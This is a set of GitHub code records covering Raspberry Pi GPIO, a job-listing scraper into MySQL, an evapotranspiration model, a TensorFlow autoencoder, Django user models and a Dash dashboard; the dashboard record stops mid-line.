+{"seq_id":"39631739107","text":"import time\nimport RPi.GPIO as GPIO\n\noutput_pin = 7 # pin to configure and use as an output\n\n# set the mode of the GPIO pin to an output\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(output_pin, GPIO.OUT)\n\n# loop 10 times, turning light on and off each loop\nfor i in range(10):\n GPIO.output(output_pin, True) # turn on\n time.sleep(2) # wait 2 seconds\n GPIO.output(output_pin, False) # turn off \n time.sleep(2) # wait 2 
seconds\n\nGPIO.cleanup()\nprint(\"Done!\")\n\n","repo_name":"ballarat-hackerspace/raspberry_pi_workshop","sub_path":"code/week2_toggling.py","file_name":"week2_toggling.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23929625267","text":"from lxml import etree\nimport json\nimport requests\n\nimport MySQLdb\nconn = MySQLdb.connect(\n host='localhost', # IP of the host running MySQL\n port=3306, \t\t # MySQL port number\n user=\"root\", # MySQL username\n password=\"123456\", # MySQL password\n db=\"piaochong\", # name of the database to use\n charset=\"utf8\" # character set for the connection\n)\ncursor = conn.cursor() # cursor\n\nproxies={\n 'http':'116.208.52.41:9999'\n}\ncount=0\nfor i in range(20):\n url='https://fe-api.zhaopin.com/c/i/sou?start=%s&pageSize=90&cityId=530&workExperience=-1&education=-1&companyType=-1&employmentType=-1&jobWelfareTag=-1&kw=python&kt=3&_v=0.99620415&x-zp-page-request-id=3c96690e724e4983814780e67dc0e2bd-1562140016350-702800&x-zp-client-id=3f37f35c-eb68-4e6e-b6c2-74b7169cc215'%(i*90)\n html_text = requests.get(url=url,proxies=proxies).text\n json_obj = json.loads(html_text)\n count+=1\n print(count,'*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n*\\n')\n\n for each_data in json_obj['data']['results']:\n url = each_data['positionURL']\n content = requests.get(url).content # binary content, encoding handled manually\n element_obj = etree.HTML(content)\n try:\n a=element_obj.xpath(\"//h3[@class='summary-plane__title']//text()\")[0]\n b=element_obj.xpath(\"//span[@class='summary-plane__salary']//text()\")[0]\n c=element_obj.xpath(\"//ul[@class='summary-plane__info']//text()\")[0]\n d=('').join(element_obj.xpath(\"//div[@class='describtion__detail-content']//text()\"))\n e=element_obj.xpath(\"//a[@class='company__title']//text()\")[0]\n f=element_obj.xpath(\"//div[@class='company__description']//text()\")[0]\n print(a,b,c,d,e,f)\n cursor.execute(\"insert into zhilian (txt1,txt2,txt3,txt4,txt5,txt6) values (%s,%s,%s,%s,%s,%s)\", (a,b,c,d,e,f)) # parameterized query avoids SQL injection and quoting errors\n conn.commit()\n except Exception:\n pass # skip listings whose detail page fails to parse\ncursor.close()\nconn.close()\n\n\n\n\n # print(element_obj.xpath('//div[@class=\"summary-plane__bottom\"]//text()'))\n # print(element_obj.xpath('//*[@class=\"summary-plane__info\"]//text()'))\n # print(element_obj.xpath('//div[@class=\"describtion\"]//text()'))\n # print(element_obj.xpath('//a[@class=\"company__title\"]//text()'))\n # print(element_obj.xpath('//*[@class=\"company__description\"]//text()'))\n\n\n# element_obj = etree.HTML(content)\n# a_url_list = element_obj.xpath('//a[@class=\"contentpile__content__wrapper__item__info\"]')\n# print(a_url_list,len(a_url_list))\n#\n# '''\n# page 1\n# https://sou.zhaopin.com/?jl=530&kw=python&kt=3&sf=0&st=0\n# page 2\n# https://sou.zhaopin.com/?p=2&jl=530&kw=python&kt=3&sf=0&st=0\n# '''\n\n\n# from urllib import request\n# import gzip\n# headers = {\n# 'accept-encoding': 'gzip'\n# }\n# url='https://jobs.zhaopin.com/CC442548133J00221073106.htm'\n# req = request.Request(url=url,headers=headers)\n# resp=request.urlopen(req)\n# aa=resp.read()\n# print(gzip.decompress(aa).decode('utf-8'))\n\n","repo_name":"hl1234567896/pp","sub_path":"com/baizhi/homework/day01_zhilian.py","file_name":"day01_zhilian.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36530010328","text":"\"\"\"\nCreated: Tuesday 1st December 2020\n@author: John Moncrieff (j.moncrieff@ed.ac.uk)\nLast Modified on 5 March 2021 14:00 \n\nDESCRIPTION\n===========\nThis package contains the model 
class object\n\n\"\"\"\n\nimport numpy as np\nimport math\n\nclass Model():\n '''\n The main model class\n '''\n # Define all the instance variables\n def __init__(self, inpt):\n self.inpt = inpt\n self.sol = self.inpt[\"solar\"]\n self.rn = 0\n self.u = self.inpt[\"wind\"]\n self.airT = self.inpt[\"airt\"]\n self.vp = self.inpt[\"vp\"]\n self.rs = self.inpt[\"rs\"]\n self.c1_svp = 6790.4985 # constant used in svp calculation\n self.c2_svp = 52.57633\n self.c3_svp = 5.02808\n self.absZero = 273.15 # Absolute zero\n self.svp = self.c_satVapPres(self.airT)\n self.Td = self.dewpoint()\n self.Tw = self.wetbulb()\n self.esTw = self.c_satVapPres(self.Tw)\n self.esTd = self.c_satVapPres(self.Td)\n self.NumSurfaceTypes = 11\n self.ustar = self.u/10 # rough rule of thumb\n self.vonKarman = 0.41\n self.sfcs = [\"grass (dry)\", \"bare soil (dry)\", \"cereals (dry)\", \"conifers (dry)\",\n \"upland (dry)\",\"grass (wet)\", \"bare soil (wet)\", \"cereals (wet)\",\n \"conifers (wet)\", \"upland (wet)\", \"water\"]\n self.surface = self.inpt[\"sfc\"]\n self.index = self.sfcs.index(self.inpt[\"sfc\"])\n \n self.tlist = [self.airT + 273.15, self.Tw + 273.15, self.Td + 273.15, self.svp, self.vp, self.esTw, self.esTd]\n \n self.srftype={\n 'grass (dry)': {'albedo': 0.25, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 40},\n 'bare soil (dry)': {'albedo': 0.15, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 100},\n 'cereals (dry)': {'albedo': 0.25, 'z': 0.35, 'z0': 0.06, 'd': 0.15, 'minrs': 40},\n 'conifers (dry)': {'albedo': 0.12, 'z': 10.0, 'z0': 0.80, 'd': 9, 'minrs': 70},\n 'upland (dry)': {'albedo': 0.25, 'z': 0.10, 'z0': 0.05, 'd': 0.05, 'minrs': 110},\n 'grass (wet)': {'albedo': 0.28, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 0.001},\n 'bare soil (wet)': {'albedo': 0.20, 'z': 0.05, 'z0': 0.03, 'd': 0.02, 'minrs': 0.001},\n 'cereals (wet)': {'albedo': 0.13, 'z': 0.35, 'z0': 0.06, 'd': 0.15, 'minrs': 0.001},\n 'conifers (wet)': {'albedo': 0.12, 'z': 10.0, 'z0': 0.80, 'd': 9, 'minrs': 0.001},\n 'upland (wet)': {'albedo': 0.22, 'z': 0.10, 'z0': 0.05, 'd': 0.05, 'minrs': 0.001},\n 'water': {'albedo': 0.05, 'z': 0.01, 'z0': 0.001, 'd': 0.001, 'minrs': 0.001}\n }\n # print(self.srftype['grass (dry)']['z0'])\n# print(self.srftype['conifers (wet)']['albedo'])\n \n self.stefanC = 0.0000000567 # Stefan-Boltzmann\n self.gamma = 0.66\n # psychrometric constant for temperatures in\n # degrees C and vapour pressures in mbar\n # need to make the next three temperature dependent\n self.cp = 1005 # specific heat of air (J kg-1)\n self.lhv = 2465000 # latent heat of vapourisation (J kg-1)\n self.rho = 1.204 # kg m-3 at 20 C\n self.tallcrops = ['conifers (dry)', 'conifers (wet)']\n \n # self.parcel = [ # point coordinates:\n# [self.airT+273.15, self.vp], # airT, vp\n# [self.airT+273.15, 17.04], # airT, svp\n# [self.Tw+273.15, self.esTw], # Tw, esTw\n# [self.Td+273.15, self.vp] # Td, vp\n# ]\n \n def wind_profile(self,sfc):\n '''returns wind speed at the height of the canopy from a \n 2 m measured wind speed\n '''\n self.ustar = self.inpt[\"wind\"]/10\n return (self.ustar/self.vonKarman) * math.log(self.srftype[sfc][\"z\"]/self.srftype[sfc][\"z0\"])\n \n def c_ra(self, sfc):\n '''calculates aerodynamic resistances\n using eqns. 
4.36 and 4.38 of MORECS report\n '''\n u = self.wind_profile(sfc)\n if sfc in self.tallcrops:\n self.ra = 56.3/u\n else: \n self.ra = (6.25 / u) * math.log(10 / self.srftype[sfc][\"z0\"]) \\\n * math.log(6 / self.srftype[sfc][\"z0\"])\n return self.ra\n \n def calculateLE(self, inpt):\n '''\n Returns radiation, energy balance, various temperatures and output\n parameters\n '''\n self.inpt = inpt\n self.sol = self.inpt[\"solar\"]\n self.rn = 0\n self.u = self.inpt[\"wind\"]\n self.airT = self.inpt[\"airt\"]\n self.vp = self.inpt[\"vp\"]\n self.index = self.sfcs.index(self.inpt['sfc'])\n self.rs = self.inpt[\"rs\"]\n self.albedo = self.srftype[str(self.inpt['sfc'])]['albedo']\n self.reflectedS = self.albedo * self.sol\n self.ra = self.c_ra(self.inpt['sfc'])\n self.nets = self.c_netShortwave()\n self.netl = self.c_netLongwave()\n # FIXME: uses air temperature, not the true surface temperature\n self.LUP = 0.95 * self.stefanC * math.pow(self.airT + self.absZero, 4) \n self.LDOWN = self.LUP - self.netl\n self.rn = self.c_netRadiation()\n self.svp = self.c_satVapPres(self.airT)\n self.Tw = self.wetbulb()\n self.esTw = self.c_satVapPres(self.Tw)\n self.Td = self.dewpoint()\n self.esTd = self.c_satVapPres(self.Td)\n self.rh = self.c_rh()\n self.delta = self.c_delta() # the SVP slope depends only on air temperature; computed unconditionally so it is always defined below\n if self.vp >= self.svp:\n self.vp = self.svp\n self.vpd = self.svp - self.vp\n self.LE = (self.delta * self.rn + self.rho * self.cp * (self.svp - self.vp)/self.ra)\\\n / (self.delta + self.gamma * (1 + self.rs / self.ra))\n self.G = 0.1 * self.rn\n self.H = self.rn - self.LE - self.G\n self.mmPerDay = self.LE * 0.035\n self.tlist = [self.airT + 273.15, self.Tw + 273.15, self.Td + 273.15, self.svp, self.vp, self.esTw, self.esTd]\n self.rblist = [self.sol, self.reflectedS, self.LDOWN, self.LUP]\n self.eblist = [self.rn, self.H, self.LE, self.G]\n self.olist = [self.rs, self.rh, self.LE, self.ra]\n return self.rblist, self.eblist, self.tlist, self.olist\n\n def c_netShortwave(self):\n '''\n calculates net shortwave radiation\n '''\n return (1 - self.srftype[str(self.inpt['sfc'])]['albedo']) * self.sol\n\n def c_netLongwave(self):\n '''\n calculates net longwave radiation at surface\n using eqn 4.22 in MORECS and clear skies !\n '''\n factor = 0.95 * self.stefanC * math.pow(self.airT + self.absZero, 4)\n return factor * (1.28 * (math.pow(self.vp / (self.airT + self.absZero), 0.142857))-1)\n \n def c_netRadiation(self):\n '''\n calculates net all-wave radiation\n '''\n return self.nets + self.netl\n \n def c_satVapPres(self, airT):\n '''\n calculates saturation vapour pressure (mbar)\n '''\n return 10 * math.exp(self.c2_svp - ((self.c1_svp / (airT + self.absZero)) +\n self.c3_svp * math.log(airT + self.absZero)))\n\n def c_rh(self):\n '''\n calculates relative humidity\n '''\n if self.vp >= self.svp:\n return 100.0\n else:\n return (self.vp / self.svp) * 100\n\n def c_delta(self):\n '''\n calculates slope of svp curve\n '''\n tup = self.airT + 0.5 # add half a degree to air temperature\n tlo = self.airT - 0.5 # subtract half a degree from air temperature\n return self.c_satVapPres(tup) - self.c_satVapPres(tlo)\n \n def dewpoint(self):\n '''\n return dewpoint\n '''\n factor = math.log(self.vp / 6.112)\n return 243.5 * factor/(17.67-factor)\n\n \n def wetbulb(self):\n '''\n # Wet bulb from http://www.the-snowman.com/wetbulb2.html\n '''\n self.rh = (self.vp / self.svp) * 100\n return (-5.806 + 0.672 * self.airT - 0.006 * self.airT * self.airT +\n (0.061 + 0.004 * self.airT + 0.000099 * self.airT * self.airT) *\n self.rh + (-0.000033 - 
0.000005 * self.airT\n - 0.0000001 * self.airT * self.airT) * self.rh * self.rh)\n","repo_name":"edinumet/pmont","sub_path":"src/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21329864116","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.rnn import LSTMCell\n\nclass Autoencoder_Time():\n def __init__(self, config):\n #Hyperparameters\n num_layers = config['num_layers']\n hidden_size = config['hidden_size']\n max_grad_norm = config['max_grad_norm']\n batch_size = config['batch_size']\n sl = config['sl']\n crd = config['crd']\n num_l = config['num_l']\n learning_rate = config['learning_rate']\n self.sl = sl\n self.batch_size = batch_size\n\n #Nodes for input variable\n self.x = tf.placeholder('float', shape = [batch_size, sl], name = 'Input_data')\n self.x_exp = tf.expand_dims(self.x, 1)\n self.keep_prob = tf.placeholder('float')\n\n #Encoder cell, multi-layered with dropout\n with tf.variable_scope('Encoder') as scope:\n cell_enc = tf.contrib.rnn.MultiRNNCell([LSTMCell(hidden_size) for _ in range(num_layers)])\n cell_enc = tf.contrib.rnn.DropoutWrapper(cell_enc, output_keep_prob = self.keep_prob)\n \n #Initial state\n initial_state_enc = cell_enc.zero_state(batch_size, tf.float32)\n \n #Layer for mean of z\n W_mu = tf.get_variable('W_mu', [hidden_size, num_l])\n outputs_enc, _ = tf.contrib.rnn.static_rnn(cell_enc, inputs = tf.unstack(self.x_exp, axis = 2), initial_state = initial_state_enc) \n cell_output = outputs_enc[-1]\n b_mu = tf.get_variable('b_mu', [num_l])\n self.z_mu = tf.nn.xw_plus_b(cell_output, W_mu, b_mu, name = 'z_mu')\n \n #Train the point in latent space to have zero mean and unit variance on batch basis\n lat_mean, lat_var = tf.nn.moments(self.z_mu, axes = [1])\n self.loss_lat_batch = tf.reduce_mean(tf.square(lat_mean) + lat_var - tf.log(lat_var) - 1)\n \n\n #Layers to generate initial state\n with tf.name_scope(\"Lat_2_dec\") as scope:\n W_state = tf.get_variable('W_state', [num_l, hidden_size])\n b_state = tf.get_variable('b_state', [hidden_size])\n z_state = tf.nn.xw_plus_b(self.z_mu, W_state, b_state, name = 'z_state')\n \n\n #Decoder cell, multi-layered\n with tf.variable_scope(\"Decoder\") as scope:\n cell_dec = tf.contrib.rnn.MultiRNNCell([LSTMCell(hidden_size) for _ in range(num_layers)])\n \n #Initial state\n initial_state_dec = tuple([(z_state, z_state)] * num_layers)\n dec_inputs = [tf.zeros([batch_size, 1])] * sl\n outputs_dec, _ = tf.contrib.rnn.static_rnn(cell_dec, inputs = dec_inputs, initial_state = initial_state_dec)\n \n \n with tf.name_scope(\"Out_layer\") as scope:\n params_o = 2*crd\n W_o = tf.get_variable('W_o', [hidden_size, params_o])\n b_o = tf.get_variable('b_o', [params_o])\n outputs = tf.concat(outputs_dec, axis = 0)\n h_out = tf.nn.xw_plus_b(outputs, W_o, b_o)\n h_mu, h_sigma_log = tf.unstack(tf.reshape(h_out, [sl, batch_size, params_o]), axis = 2)\n h_sigma = tf.exp(h_sigma_log)\n dist = tf.contrib.distributions.Normal(h_mu, h_sigma)\n px = dist.log_prob(tf.transpose(self.x))\n loss_seq = -px\n self.loss_seq = tf.reduce_mean(loss_seq)\n \n \n with tf.name_scope(\"train\") as scope:\n #Use learning rate deacy\n global_step = tf.Variable(0, trainable = False)\n lr = tf.train.exponential_decay(learning_rate, global_step, 1000, 0.1, staircase = False)\n \n self.loss = self.loss_seq + self.loss_lat_batch\n \n \n tvars = tf.trainable_variables()\n grads = 
tf.gradients(self.loss, tvars)\n grads, _ = tf.clip_by_global_norm(grads, max_grad_norm) #Gradient clipping to prevent explosion\n self.numel = tf.constant([[0]])\n \n #Apply the gradients\n optimizer = tf.train.AdamOptimizer(lr)\n gradients = zip(grads, tvars)\n self.train_step = optimizer.apply_gradients(gradients, global_step = global_step)\n self.numel = tf.constant([[0]])\n \n \n tf.summary.tensor_summary('lat_state', self.z_mu)\n self.merged = tf.summary.merge_all()\n self.init_op = tf.global_variables_initializer()\n\n","repo_name":"vishaltheone1/Weld-Joint-Strength-Prediction","sub_path":"Autoencoder_method.py","file_name":"Autoencoder_method.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10699409033","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nclass UserInterest(models.Model):\n email = models.EmailField(_('email address'))\n\nclass CustomUser(AbstractUser):\n MALE = 'm'\n FEMALE = 'f'\n NONBINARY = 'n'\n GENDER_CHOICES = [\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n (NONBINARY, 'Non-Binary')\n ]\n\n METRIC = 'm'\n IMPERIAL = 'i'\n SYSTEMS = [\n (METRIC, 'Metric'),\n (IMPERIAL, 'Imperial'),\n ]\n\n EVERYONE = 'e'\n REGISTERED_USERS = 'r'\n FOLLOWERS = 'f'\n OWN_USER = 'u'\n\n VISIBILITIES = [\n (EVERYONE, 'Everyone'),\n (REGISTERED_USERS, 'Registered users'),\n (FOLLOWERS, 'Followers'),\n (OWN_USER, 'Own user')\n ]\n\n NOVICE = 'n'\n INTERMEDIATE = 'i'\n ADVANCED = 'a'\n TIERS = [\n (NOVICE, 'Novice'),\n (INTERMEDIATE, 'Intermediate'),\n (ADVANCED, 'Advanced'),\n ]\n\n email = models.EmailField(unique=True)\n\n gender = models.CharField(max_length=1, null=True, choices=GENDER_CHOICES)\n year_birth = models.IntegerField(null=True)\n month_birth = models.IntegerField(null=True)\n system = models.CharField(max_length=1, choices=SYSTEMS, default=METRIC)\n location = models.CharField(max_length=200, null=True, blank=True)\n biography = models.TextField(null=True, blank=True)\n profile_filename = models.CharField(max_length=1024, null=True)\n default_weight_unit = models.IntegerField(default=1)\n default_speed_unit = models.IntegerField(default=11)\n default_distance_unit = models.IntegerField(default=5)\n # KCAL = 15\n default_energy_unit = models.IntegerField(default=15)\n\n default_visibility_workouts = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n default_visibility_user_bio_datas = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n\n visibility = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n\n follow_approval_required = models.BooleanField(default=False)\n\n followers = models.ManyToManyField(\"self\", related_name='user_followers', blank=True, symmetrical=False)\n following = models.ManyToManyField(\"self\", related_name='user_following', blank=True, symmetrical=False)\n blocked_users = models.ManyToManyField(\"self\", related_name='user_blocked', blank=True, symmetrical=False)\n blocked_by = models.ManyToManyField(\"self\", related_name='user_blocked_by', blank=True, symmetrical=False)\n follower_requests = models.ManyToManyField(\"self\", related_name='user_follower_requests', blank=True, symmetrical=False)\n followers_number = models.IntegerField(default=0)\n followings_number = models.IntegerField(default=0)\n\n tier = models.CharField(max_length=1, choices=TIERS, default=NOVICE)\n\n experience 
= models.IntegerField(default=1000)\n level = models.IntegerField(default=1)\n primary_class = models.CharField(max_length=200, null=True, default='Athlete')\n secondary_class = models.CharField(max_length=200, null=True)\n primary_class_computed = models.CharField(max_length=200, null=True, default='Athlete')\n secondary_class_computed = models.CharField(max_length=200, null=True)\n\n custom_class = models.BooleanField(default=False)\n\n def __str__(self):\n return self.username\n\nclass File(models.Model):\n file = models.ImageField(blank=False, null=False)\n user = models.ForeignKey(CustomUser, related_name='user_file', null=True, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.file.name\n\nclass UserDataRequest(models.Model):\n user = models.ForeignKey(CustomUser, related_name='user_data_request', on_delete=models.CASCADE)\n","repo_name":"t-recx/sukuwatto","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38596414488","text":"# =============================== #\n\nimport locale\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.figure_factory as ff\nimport dash_bootstrap_components as dbc\nfrom dash import html, dcc, Output, Input\nfrom app import app\nimport dash\n\n# =============================== #\nlocale.setlocale(locale.LC_ALL, 'pt_BR.utf8') \n\nscope = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/spreadsheets\", \"https://www.googleapis.com/auth/drive\"]\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('arquivojson.json', scope)\nclient = gspread.authorize(credentials)\nspreadsheet = client.open_by_key('chave-planilha')\nsheet = spreadsheet.get_worksheet(0)\nvalues = sheet.get_all_values()\nsublistas_selecionadas = values[2:]\n\n# =============================== #\n\ndf = pd.DataFrame()\nfor sublista in sublistas_selecionadas:\n if len(sublista) > 0: \n nome_coluna = sublista[0]\n valores_coluna = sublista[1:] \n df[nome_coluna] = valores_coluna\n \nlista1 = sublistas_selecionadas[0]\n\nlista2 = sublistas_selecionadas[1]\nsolicitacoes_retencao = lista2[:4]\nrenovaram_financeiro = lista2[9:]\n\nlista3 = sublistas_selecionadas[2]\ncancelados_retencao = lista3[:4]\nnao_pagou_financeiro = lista3[9:]\n\nlista4 = sublistas_selecionadas[3]\nrevertidos_retencao = lista4[:4]\nrenovou_downsol_financeiro = lista4[9:]\n\nlista5 = sublistas_selecionadas[4]\nmrr_revertido_retencao = lista5[:4] \ncancelou_retencao_financeiro = lista5[9:]\n\nlista6 = sublistas_selecionadas[5]\nmrr_cancelado_retencao = lista6[:4] \nmrr_renovado_financeiro = lista6[9:]\n\nlista7 = sublistas_selecionadas[6]\nmrr_revertidoHS_retencao = lista7[:4] \nmrr_renovado_downsel_financeiro = lista7[9:]\n\nlista8 = sublistas_selecionadas[7]\nporcentag_reversao_retencao = lista8[:4] \nmrr_nao_pago_financeiro = lista8[9:]\n\nlista9 = sublistas_selecionadas[8]\nupsell_mrr_retencao = lista9[:4] \nmrr_cancelou_financeiro = lista9[9:] \n\nlista10 = sublistas_selecionadas[9]\ntotal_mrr_retencao = lista10[:4] \nmrr_certificados_vencidos_financeiro = lista10[9:] \n\nlista12 = sublistas_selecionadas[10]\nnegociacoes_pagas_mrr = lista12[9:] \n\nlista13 = sublistas_selecionadas[11]\nnegociacoes_nao_pagas_mrr = lista13[9:] \n\nlista16 = sublistas_selecionadas[12]\ntotal_MRR_feito = lista16[9:] \n\nlista14 = 
sublistas_selecionadas[13]\ndescontos_renovacoesARR_financeiro = lista14[9:] \n\nlista15 = sublistas_selecionadas[14]\ndescontos_renovacoesMRR_financeiro = lista15[9:] \n\n# ============= Financeiro ================== #\n\nlistas = [renovaram_financeiro, nao_pagou_financeiro, renovou_downsol_financeiro,\n cancelou_retencao_financeiro, mrr_renovado_financeiro,\n mrr_renovado_downsel_financeiro, mrr_nao_pago_financeiro,\n mrr_cancelou_financeiro, mrr_certificados_vencidos_financeiro, negociacoes_pagas_mrr,\n negociacoes_nao_pagas_mrr, total_MRR_feito,\n descontos_renovacoesARR_financeiro,descontos_renovacoesMRR_financeiro]\nlistas_resultantes = []\n\nfor lista in listas: \n primeiros_elementos = lista[1:4]\n listas_resultantes.append(primeiros_elementos)\n \ndf_financeiro = pd.DataFrame({'Renovaram': listas_resultantes[0],\n 'Não Pagou': listas_resultantes[1],\n 'Renovou com Downsell': listas_resultantes[2],\n 'Cancelou': listas_resultantes[3],\n 'MRR renovado': listas_resultantes[4],\n 'MRR renovado com Downsell': listas_resultantes[5],\n 'MRR não pago': listas_resultantes[6],\n 'MRR cancelou': listas_resultantes[7],\n 'MRR - Certificados vencidos': listas_resultantes[8],\n 'Negociações pagas - Em MRR': listas_resultantes[9],\n 'Negociações não pagas - Em MRR': listas_resultantes[10],\n 'Total de MRR feito': listas_resultantes[11],\n 'Desconto dado para as renovações - ARR': listas_resultantes[12],\n 'Desconto dado para as renovações - MRR': listas_resultantes[13]})\nnomes = ['Pessoa1', 'Pesso2', 'Pessoa3']\ndf_financeiro.insert(0, 'Nome', nomes)\n\ncolunas_monetarias = ['MRR renovado', 'MRR renovado com Downsell', 'MRR não pago', 'Renovou com Downsell',\n 'MRR cancelou', 'Negociações pagas - Em MRR', 'Negociações não pagas - Em MRR',\n 'MRR - Certificados vencidos', 'Total de MRR feito', 'Desconto dado para as renovações - ARR', 'Desconto dado para as renovações - MRR']\n\nfor coluna in colunas_monetarias:\n df_financeiro[coluna] = df_financeiro[coluna].str.replace('R\\$ ', '', regex=True)\n df_financeiro[coluna] = df_financeiro[coluna].str.replace('.', '').str.replace(',', '.', regex=True)\nfor coluna in colunas_monetarias:\n df_financeiro[coluna] = pd.to_numeric(df_financeiro[coluna], errors='coerce')\ndf_financeiro = df_financeiro.fillna(0)\n\n# ============== Retenção ================= #\n\nlistas_retencao = [solicitacoes_retencao, cancelados_retencao,\n revertidos_retencao, mrr_revertido_retencao,\n mrr_cancelado_retencao, mrr_revertidoHS_retencao,\n porcentag_reversao_retencao, upsell_mrr_retencao, total_mrr_retencao]\nlistas_resultantes_retencao = []\n\nfor lista in listas_retencao: # para cada lista\n primeiros_elementos = lista[1:4] # selecionar apenas o elemento 0 ao 4\n listas_resultantes_retencao.append(primeiros_elementos) # junta os elementos em uma lista\n\ndf_retencao = pd.DataFrame({'Solicitações': listas_resultantes_retencao[0],\n 'Cancelados': listas_resultantes_retencao[1],\n 'Revertidos': listas_resultantes_retencao[2],\n 'MRR Revertido': listas_resultantes_retencao[3],\n 'MRR Cancelado': listas_resultantes_retencao[4],\n 'MRR revertido HS': listas_resultantes_retencao[5],\n '% de reversão': listas_resultantes_retencao[6],\n 'Upsell MRR': listas_resultantes_retencao[7],\n 'Total MRR Retenção': listas_resultantes_retencao[8],})\nnomes = ['Pessoa4', 'Pessoa5', 'Pesssoa6']\ndf_retencao.insert(0, 'Nome', nomes)\ndf_retencao.fillna(0)\n\ncolunas_monetarias2 = ['MRR Revertido', 'MRR Cancelado', 'MRR revertido HS', 'Upsell MRR', 'Total MRR Retenção']\n\nfor coluna in 
colunas_monetarias2:\n df_retencao[coluna] = df_retencao[coluna].str.replace('R\\$ ', '', regex=True)\n df_retencao[coluna] = df_retencao[coluna].str.replace('.', '').str.replace(',', '.', regex=True)\nfor coluna in colunas_monetarias2:\n df_retencao[coluna] = pd.to_numeric(df_retencao[coluna], errors='coerce')\n\ndf_retencao = df_retencao.fillna(0) # fillna returns a new frame, so the result must be assigned\n\ndf_retencao['% de reversão'] = [value.replace(\"%\", \"\").replace(\".\", \",\") for value in df_retencao['% de reversão']]\ndf_retencao['% de reversão'] = [\n float(value.replace(\",\", \".\")) if value else None\n for value in df_retencao['% de reversão']\n]\ndf_retencao['Reversão do Time'] = (df_retencao['% de reversão'].sum() / 3).round(2) # average across the 3 team members\n\n\n# ============== Totals of the variables ================= #\n\nsoma_mrr_feito_retencao = df_retencao['Total MRR Retenção'].sum() # total for the retention team\nsoma_mrr_feito_retencao1 = soma_mrr_feito_retencao.round(2) # round to 2 decimal places\nsoma_mrr_feito_retencao1 = '{:,.2f}'.format(soma_mrr_feito_retencao1).replace(',', ' ').replace('.', ',').replace(' ', '.') # swap separators to Brazilian number format\nsoma_mrr_feito_retencao1 = f'R$ {soma_mrr_feito_retencao1}' # prefix with R$\n\nreversao_retencao = df_retencao['Reversão do Time'][1] \nreversao_retencao = f\"{reversao_retencao} %\"\n\nmrr_revertido_financeiro = df_financeiro['Total de MRR feito'].sum() # total for the finance team\nmrr_revertido_financeiro = round(mrr_revertido_financeiro, 2) # round to 2 decimal places\nmrr_revertido_financeiro = '{:,.2f}'.format(mrr_revertido_financeiro).replace(',', ' ').replace('.', ',').replace(' ', '.') # swap separators to Brazilian number format\nmrr_revertido_financeiro = f'R$ {mrr_revertido_financeiro}' # prefix with R$\n\n# ================================= #\n\nsolicitacoes_ret = df_retencao['Solicitações'].astype(int).sum()\ncancelados_ret = df_retencao['Cancelados'].astype(int).sum()\nrevertidos_ret = df_retencao['Revertidos'].astype(int).sum()\nmrr_revertido_ret = df_retencao['MRR Revertido'].sum()\nmrr_revertido_ret = mrr_revertido_ret.round(2)\nmrr_cancelado_ret = df_retencao['MRR Cancelado'].sum()\nmrr_cancelado_ret = mrr_cancelado_ret.round(2)\nmrr_revertido_hs_ret = df_retencao['MRR revertido HS'].sum()\nmrr_revertido_hs_ret = mrr_revertido_hs_ret.round(2)\nupsell_mrr_ret = df_retencao['Upsell MRR'].sum()\nupsell_mrr_ret = upsell_mrr_ret.round(2)\ntotal_mrr_ret = df_retencao['Total MRR Retenção'].sum()\ntotal_mrr_ret = total_mrr_ret.round(2)\n\ndata_retencao = {\n 'MRR': [\"Total MRR Retenção\", \"MRR revertido HS\", \"MRR Revertido\", \"MRR Cancelado\", \"Upsell MRR\"],\n 'Valor': [total_mrr_ret, mrr_revertido_hs_ret, mrr_revertido_ret, mrr_cancelado_ret, upsell_mrr_ret],\n 'Cor': ['#04ad43', '#04ad43', '#04ad43', '#f50909', '#04ad43'] # specific colors per metric (red for MRR Cancelado)\n}\n\ndata_retencao_sorted = sorted(zip(data_retencao['MRR'], data_retencao['Valor'], data_retencao['Cor']), key=lambda x: x[1], reverse=True)\ndata_retencao['MRR'] = [item[0] for item in data_retencao_sorted]\ndata_retencao['Valor'] = [item[1] for item in data_retencao_sorted]\ndata_retencao['Cor'] = [item[2] for item in data_retencao_sorted]\n\n# ========= Overall Retention chart - 1 =========== #\n\nfig_retencao = go.Figure()\nfor mrr, valor, cor in zip(data_retencao['MRR'], data_retencao['Valor'], data_retencao['Cor']):\n fig_retencao.add_trace(go.Bar(\n x=[valor],\n y=[mrr],\n orientation='h',\n marker={\"color\": cor},\n hoverinfo=\"none\"\n ))\nfig_retencao.update_layout(\n height=400,\n width=700,\n template=\"plotly_white\",\n margin={\"l\": 
